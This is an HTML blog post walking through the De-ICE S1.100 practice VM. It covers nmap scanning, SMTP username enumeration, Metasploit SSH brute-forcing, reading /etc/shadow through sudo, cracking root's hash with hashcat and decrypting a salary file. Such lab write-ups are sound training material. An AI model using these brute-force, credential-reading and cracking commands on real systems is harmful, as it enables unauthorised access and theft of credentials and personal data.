

  
    
  


  




  


  

<!DOCTYPE html>
<html lang="en-us">
  <head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator" content="Hugo 0.26">
    <meta name="theme" content="Tranquilpeak 0.3.1-BETA">
    <title>De-ICE S1.100</title>
    <meta name="author" content="Rasta Mouse">
    <meta name="keywords" content="">

    <link rel="icon" href="https://rastamouse.me/favicon.png">
    

    
    <meta name="description" content="Scenario

The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn&rsquo;t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company&rsquo;s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

">
    <meta property="og:description" content="Scenario

The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn&rsquo;t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company&rsquo;s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="De-ICE S1.100">
    <meta property="og:url" content="/2017/07/de-ice-s1.100/">
    <meta property="og:site_name" content="Rasta Mouse">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Rasta Mouse">
    <meta name="twitter:description" content="Scenario

The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn&rsquo;t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company&rsquo;s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

">
    
      <meta name="twitter:creator" content="@_RastaMouse">
    
    

    
    

    
      <meta property="og:image" content="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=640">
    

    
      <meta property="og:image" content="https://rastamouse.me/images/de-ice-s1-100/icon.png">
    
    
    

    

    
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.css" />
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" />
    
    
    <link rel="stylesheet" href="https://rastamouse.me/css/style-u6mk0ojoywresbx8iepslrmmhl4stuhrsxuwhkpwrkrx7mryjcaimasnk4pi.min.css" />
    
    

    
      
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-60712346-1', 'auto');
ga('send', 'pageview');
</script>

    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://rastamouse.me/">Rasta Mouse</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://rastamouse.me/#about">
    
    
    
      
        <img class="header-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=90" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://rastamouse.me/#about">
          <img class="sidebar-profile-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=110" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Rasta Mouse</h4>
        
          <h5 class="sidebar-profile-bio">Taylor Swift fan, wannabe Red Teamer &amp; 1337 hax0r (in that order).</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Categories</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">Archives</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://twitter.com/_RastaMouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-twitter"></i>
      
      <span class="sidebar-button-desc">Twitter</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://keybase.io/rasta_mouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-lock"></i>
      
      <span class="sidebar-button-desc">Keybase</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastalabs.net" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-shield"></i>
      
      <span class="sidebar-button-desc">RastaLabs</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/rasta-mouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>

    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="4"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      De-ICE S1.100
    </h1>
  
  <div class="postShorten-meta post-meta">
  
    <time itemprop="datePublished" datetime="2017-07-15T00:00:00Z">
      
  
  
  
  
    15 July 2017
  

    </time>
  
  
  
  
    <span>in</span>
    
      <a class="category-link" href="https://rastamouse.me/categories/walkthroughs">walkthroughs</a>
    
  


</div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <h1 id="scenario">Scenario</h1>

<p>The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn&rsquo;t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company&rsquo;s contact information.</p>

<p>The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.</p>

<p></p>

<h2 id="flags">Flags</h2>

<ul>
<li>Encrypted salary file</li>
<li>Broken FTP service</li>
</ul>

<h1 id="port-scanning-service-enumeration">Port Scanning, Service Enumeration</h1>

<p>Start by scanning the host to determine which ports are open and which services are running.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  nmap -n -A 192.168.1.100

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-15 13:42 BST
Nmap scan report for 192.168.1.100
Host is up (0.000074s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
|   2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
|   2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_  2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use &quot;HELP &lt;topic&gt;&quot;. 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: NAMESPACE LOGIN-REFERRALS SORT MULTIAPPEND UNSELECT AUTH=LOGINA0001 LITERAL+ IDLE MAILBOX-REFERRALS BINARY THREAD=ORDEREDSUBJECT CAPABILITY OK STARTTLS completed SASL-IR SCAN THREAD=REFERENCES IMAP4REV1
443/tcp closed https
MAC Address: 00:0C:29:61:35:DD (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix
</code></pre>

<p>One possible way to get into this VM is by bruteforcing a valid ssh login - we first determine that password authentication is enabled by attemping to login a few times.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  ssh rasta@192.168.1.100
rasta@192.168.1.100's password: 
Permission denied, please try again.
rasta@192.168.1.100's password: 
Permission denied, please try again.
rasta@192.168.1.100's password: 
Permission denied (publickey,password,keyboard-interactive).
</code></pre>

<p>The available authentication methods are printed after the permission denied message.</p>

<h1 id="username-harvesting">Username Harvesting</h1>

<p>Open a browser and navigate to <code>http://192.168.1.100</code>, where we find the <code>Information Company Portal</code>.</p>


<figure >
    
        <img src="https://rastamouse.me/images/de-ice-s1-100/company-portal.png" />
    
    
</figure>


<p>The page contains a list of employee roles, names and email address - information we can use towards bruteforcing SSH. So let&rsquo;s do that :)</p>

<h2 id="the-wrong-way">The Wrong Way</h2>

<p>Save the employee list to a file, then extract their usernames into a separate list.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list 
Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr. System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f2 | cut -d '@' -f1 | sed 's/^ //g'
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f2 | cut -d '@' -f1 | sed 's/^ //g' &gt; usernames
</code></pre>

<p>Launch the Metasploit Framework.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  msfconsole -q
msf &gt;
</code></pre>

<p>Use the <code>ssh_login</code> module and enter the following options:</p>

<pre><code class="language-text">msf &gt; use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) &gt; set RHOSTS 192.168.1.100
msf auxiliary(ssh_login) &gt; set USER_FILE /root/vulnhub/de-ice_s1.100/usernames
msf auxiliary(ssh_login) &gt; set PASS_FILE /usr/share/wordlists/metasploit/password.lst
msf auxiliary(ssh_login) &gt; run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'marym:!@#$%'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'marym:!@#$%^'
[-] SSH - Failed: 'marym:!@#$%^&amp;'
[-] SSH - Failed: 'marym:!@#$%^&amp;*'
[-] SSH - Failed: 'marym:!boerbul'
[-] SSH - Failed: 'marym:!boerseun'
[-] SSH - Failed: 'marym:!gatvol'
[-] SSH - Failed: 'marym:!hotnot'
[-] SSH - Failed: 'marym:!kak'
[-] SSH - Failed: 'marym:!koedoe'
[-] SSH - Failed: 'marym:!likable'
</code></pre>

<p>Come back in 4 hours to see zero results :(
What did we do wrong?</p>

<p>We made two grave assumptions:</p>

<ul>
<li>That the email address usernames were the same as their system login usernames.</li>
<li>That all those usernames existed on the system.</li>
</ul>

<h2 id="the-right-way">The Right Way</h2>

<p>Take the employee list and extract their Full Names into a separate list.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f1 | cut -d ':' -f2 | sed 's/^ //g'
Marie Mary
Pat Patrick
Terry Thompson
Ben Benedict
Erin Gennieg
Paul Michael
Ester Long
Adam Adams
Bob Banter
Chad Coffee

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  cat employee-list | cut -d '-' -f1 | cut -d ':' -f2 | sed 's/^ //g' &gt; fullnames
</code></pre>

<p>Grab this <a href="https://gist.github.com/superkojiman/11076951">Gist</a> by <a href="https://twitter.com/superkojiman">superkojiman</a> (or any other similar tool) to generate lots of different possible usernames.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  /opt/namemash.py fullnames            
mariemary
marymarie
marie.mary
mary.marie
marym
mmary
mmarie
m.mary
m.marie
marie
mary
[...]

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  /opt/namemash.py fullnames &gt; usernames
</code></pre>

<p>Now we want to actually verify which of these are valid user accounts on the target, which we can do via the <code>smtp</code> service. <code>smtp-user-enum</code> is a handy script for automating this process, but I always recommend trying manually in the first instance. Here&rsquo;s why.</p>

<p>These are the examples provided in the <code>smtp-user-enum</code> script:</p>

<pre><code class="language-text">smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1
smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1
</code></pre>

<p>If we try each one in turn:</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M VRFY -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:45:07 2017 #########
192.168.1.100: marie.mary exists
192.168.1.100: mary.marie exists
192.168.1.100: mmary exists
[...]
192.168.1.100: chad exists
192.168.1.100: c.chad exists
192.168.1.100: coffee exists

######## Scan completed at Sat Jul 15 14:45:08 2017 #########
110 results.

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M EXPN -U usernames -t 192.168.1.100 
######## Scan started at Sat Jul 15 14:47:38 2017 #########
######## Scan completed at Sat Jul 15 14:47:38 2017 #########
0 results.

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M RCPT -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:48:16 2017 #########
######## Scan completed at Sat Jul 15 14:48:16 2017 #########
0 results.

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M EXPN -D herot.net -U usernames -t 192.168.1.100
######## Scan started at Sat Jul 15 14:54:14 2017 #########
######## Scan completed at Sat Jul 15 14:54:15 2017 #########
0 results.
</code></pre>

<p>We get no meaningful results.</p>

<p>To work out what&rsquo;s going on, connect to the smtp service and run commands manually - that way you can see out the output being returned.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 14:58:47 GMT
HELO x
250 slax.example.net Hello [192.168.1.200], pleased to meet you
VRFY mariemary
252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery (or try finger)

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 15:00:42 GMT
HELO x    
250 slax.example.net Hello [192.168.1.200], pleased to meet you
EXPN mariemary
502 5.7.0 Sorry, we do not allow this operation

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  ncat 192.168.1.100 25
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sat, 15 Jul 2017 15:05:03 GMT
HELO x
250 slax.example.net Hello [192.168.1.200], pleased to meet you
RCPT TO: mariemary
503 5.0.0 Need MAIL before RCPT

MAIL FROM: rasta@mouse
451 4.1.8 Domain of sender address rasta@mouse does not resolve
MAIL FROM: rasta@192.168.1.200
451 4.1.8 Domain of sender address rasta@192.168.1.200 does not resolve
MAIL FROM: rasta@localhost
553 5.5.4 rasta@localhost... Real domain name required for sender address
MAIL FROM: rasta@127.0.0.1
451 4.1.8 Domain of sender address rasta@127.0.0.1 does not resolve
MAIL FROM: rasta@slax.example.net
250 2.1.0 rasta@slax.example.net... Sender ok

RCPT TO: mariemary
550 5.1.1 mariemary... User unknown
RCPT TO: root
250 2.1.5 root... Recipient ok
</code></pre>

<p>Now we are getting somewhere. We&rsquo;ve learned that <code>VRFY</code> and <code>EXPN</code> don&rsquo;t seem to work. <code>RCPT</code> does work, but only if we specify <code>@slax.exmaple.net</code> as the <code>MAIL FROM</code> address. Now automate the rest in <code>smtp-user-enum</code>.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  smtp-user-enum -M RCPT -U usernames -f rasta@slax.example.net -t 192.168.1.100
######## Scan started at Sat Jul 15 15:14:44 2017 #########
192.168.1.100: aadams exists
192.168.1.100: bbanter exists
192.168.1.100: ccoffee exists
######## Scan completed at Sat Jul 15 15:14:44 2017 #########
</code></pre>

<p>We now know these are the only 3 users on the system (which makes sense against what we know from the portal page) and we see that their usernames are indeed different than their email addresses. Modify your usernames file so that it only contains these 3.</p>

<h2 id="ssh">SSH</h2>

<p>Go back to the <code>ssh_login</code> module and modify our options.</p>

<pre><code class="language-text">msf auxiliary(ssh_login) &gt; unset PASS_FILE 
msf auxiliary(ssh_login) &gt; set BLANK_PASSWORDS true
msf auxiliary(ssh_login) &gt; set USER_AS_PASS true
msf auxiliary(ssh_login) &gt; run 

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'aadams:aadams'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'aadams:'
[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.200:43077 -&gt; 192.168.1.100:22) at 2017-07-15 17:10:53 +0100
[-] SSH - Failed: 'ccoffee:ccoffee'
[-] SSH - Failed: 'ccoffee:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>

<p>We got a hit on valid creds - <code>bbanter:bbanter</code>.</p>

<p>You can use the built-in ssh client of MSF.</p>

<pre><code class="language-text">msf auxiliary(ssh_login) &gt; sessions 

Active sessions
===============

  Id  Type          Information                             Connection
  --  ----          -----------                             ----------
  1   shell /linux  SSH bbanter:bbanter (192.168.1.100:22)  192.168.1.200:43077 -&gt; 192.168.1.100:22 (192.168.1.100)

msf auxiliary(ssh_login) &gt; sessions -i 1
[*] Starting interaction with 1...

id; whoami; pwd
uid=1001(bbanter) gid=100(users) groups=100(users)
bbanter
/home/bbanter
</code></pre>

<p>But since it doesn&rsquo;t have a command prompt and can&rsquo;t do tab completion etc, I prefer to use the regular OpenSSH client.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ id; whoami; pwd 
uid=1001(bbanter) gid=100(users) groups=100(users)
bbanter
/home/bbanter
</code></pre>

<h2 id="situational-awareness">Situational Awareness</h2>

<p>Confirm the users of the system by reading <code>/etc/passwd</code>.</p>

<pre><code class="language-text">bbanter@slax:~$ cat /etc/passwd 
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
[...]
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
</code></pre>

<p>We see that <code>aadams</code> has a <code>uid</code> (User ID) of <code>1000</code> and a <code>gid</code> (Group ID) of <code>10</code>. <code>bbanter</code> and <code>ccoffee</code> have a <code>gid</code> of <code>100</code>. By reading <code>/etc/group</code>, we find what these groups are/mean.</p>

<pre><code class="language-text">bbanter@slax:~$ cat /etc/group 
root::0:root
[...]
wheel::10:root
[...]
users::100:
</code></pre>

<p><code>bbanter</code> and <code>ccoffee</code> are just users; <code>aadams</code> is a member of <code>wheel</code>. The <code>wheel</code> group is used in some Linux system to enable its members to <code>su</code> to <code>root</code>, so it indicates a level of privileged access. It seems to obtain root access, aadams may be a good target.</p>

<p>We find an ftp folder by looking at the home directories, but we need to be root to access it.</p>

<pre><code class="language-text">aadams@slax:~$ ls -l /home/
total 0
drwxr-x--- 2 aadams  users  80 Jun 29  2007 aadams
drwxr-x--- 2 bbanter users 100 Jul 15 13:18 bbanter
drwxr-x--- 2 ccoffee users  80 Jun 29  2007 ccoffee
drwx------ 3 root    root   60 Jun 29  2007 ftp
</code></pre>

<h2 id="more-bruteforce">More Bruteforce</h2>

<p>To get access as <code>aadams</code>, we do some more intense ssh bruteforcing. This one takes significantly longer though.</p>

<pre><code class="language-text">msf auxiliary(ssh_login) &gt; set BLANK_PASSWORDS false
msf auxiliary(ssh_login) &gt; set USERNAME aadams
msf auxiliary(ssh_login) &gt; unset USER_FILE 
msf auxiliary(ssh_login) &gt; set PASS_FILE /usr/share/wordlists/metasploit/password.lst
msf auxiliary(ssh_login) &gt; set STOP_ON_SUCCESS true
msf auxiliary(ssh_login) &gt; run 

[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 i686 i386 GNU/Linux '
</code></pre>

<p>Since we&rsquo;re still logged in as <code>bbanter</code>, we just use <code>su</code> to switch to <code>aadams</code>.</p>

<pre><code class="language-text">bbanter@slax:~$ su aadams
Password: ***********
aadams@slax:/home/bbanter$ id; whoami
uid=1000(aadams) gid=10(wheel) groups=10(wheel)
aadams
</code></pre>

<h2 id="getting-root">Getting Root</h2>

<p>List the commands <code>aadams</code> is allowed to run with <code>sudo</code>.</p>

<pre><code class="language-text">aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*
</code></pre>

<p>We are specifically forbidden to run <code>su</code> with the string <code>root</code>.</p>

<pre><code class="language-text">aadams@slax:~$ su root
Password: ***********
Sorry.
</code></pre>

<p>Running <code>ls</code> as <code>root</code> means we can now see inside the <code>ftp</code> directory.</p>

<pre><code class="language-text">aadams@slax:~$ sudo ls -lR /home/ftp/
/home/ftp/:
total 0
dr-xr-xr-x 2 root root 80 Jun 29  2007 incoming

/home/ftp/incoming:
total 140
-r-xr-xr-x 1 root root 133056 Jun 29  2007 salary_dec2003.csv.enc
</code></pre>

<p>There&rsquo;s our encrypted salary information. From the clue in <code>/etc/password</code>, we can surmise we need the root password to decrypt the file.</p>

<p>Use <code>sudo</code> to read the password hashes from <code>/etc/shadow</code>.</p>

<pre><code class="language-text">aadams@slax:~$ sudo cat /etc/shadow 
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
[...]
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
</code></pre>

<p><code>$1$</code> means this is an <code>md5</code> hash and <code>TOi0HE5n</code> is a salt. Each hash is using a different salt, which prevents the use of <a href="https://en.wikipedia.org/wiki/Rainbow_table">rainbow table</a> attacks.</p>

<p>Feed these into a password cracker like John the Ripper or hashcat.</p>

<pre><code class="language-text">hashcat64.exe -a 3 -m 500 C:\Users\Rasta\Desktop\de-ice_s1-100_hashes -i ?l?l?l?l?l?l
$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:tarot
</code></pre>

<p>Now switch to root.</p>

<pre><code class="language-text">aadams@slax:~$ su root
Password: *****
root@slax:/home/aadams# id; whoami
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
root
</code></pre>

<h2 id="getting-the-flag">Getting the Flag</h2>

<p>Now we can access the encrypted file and have full control over the VM. The challenge description hinted that it wanted us to fix the broken ftp service and use that to exfiltrate the flag.</p>

<pre><code class="language-text">root@slax:/home/ftp/incoming# head -n 1 salary_dec2003.csv.enc | strings 
Salted__n
Lw$A`
YN&gt;7
#ki8
</code></pre>

<p><code>Salted__</code> is a clue that the file was encrypted with OpenSSL - De-ICE is obviously running an old version.</p>

<pre><code class="language-text">root@slax:~# openssl 
OpenSSL&gt; version
OpenSSL 0.9.8b 04 May 2006

╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  openssl
OpenSSL&gt; version
OpenSSL 1.1.0e  16 Feb 2017
</code></pre>

<p>The two are different enough that commands on one won&rsquo;t work on the other. To keep this walkthrough in keeping with the original solution of the time, we&rsquo;ll decrypt the file on the VM and transfer it to ourselves via FTP (instead of the other way around).</p>

<p>We don&rsquo;t yet know which cipher was used for the encryption - we can print a list of those available.</p>

<pre><code class="language-text">root@slax:/home/ftp/incoming# openssl list-cipher-commands
aes-128-cbc
aes-128-ecb
aes-192-cbc
[...]
rc2-ofb
rc4
rc4-40
</code></pre>

<p>In this version of OpenSSL, there are 42. You can write a script that will run through and try them all, or you can get lucky, try the first one and win ;)</p>

<pre><code class="language-text">root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:

root@slax:/home/ftp/incoming# ls -l
total 280
-rw-r--r-- 1 root root 133038 Jul 16 00:17 salary_dec2003.csv
-r-xr-xr-x 1 root root 133056 Jun 29  2007 salary_dec2003.csv.enc

root@slax:/home/ftp/incoming# less salary_dec2003.csv
,Employee information,,,,,,,,,,,,,,
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total
 Taxes Withheld (Percentage),&quot;Insurance
Deduction
(Dollars)&quot;,&quot;Other Regular
Deduction
(Dollars)&quot;,&quot;Total Regular Deductions (Excluding taxes, in dollars)&quot;,&quot;Direct Deposit Info
Routing Number&quot;,&quot;Direct Deposit Info
Account Number&quot;
,1,Charles E. Ophenia,&quot;$225,000.00&quot;,1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,&quot;$56,000.00&quot;,1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,&quot;$43,350.00&quot;,1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
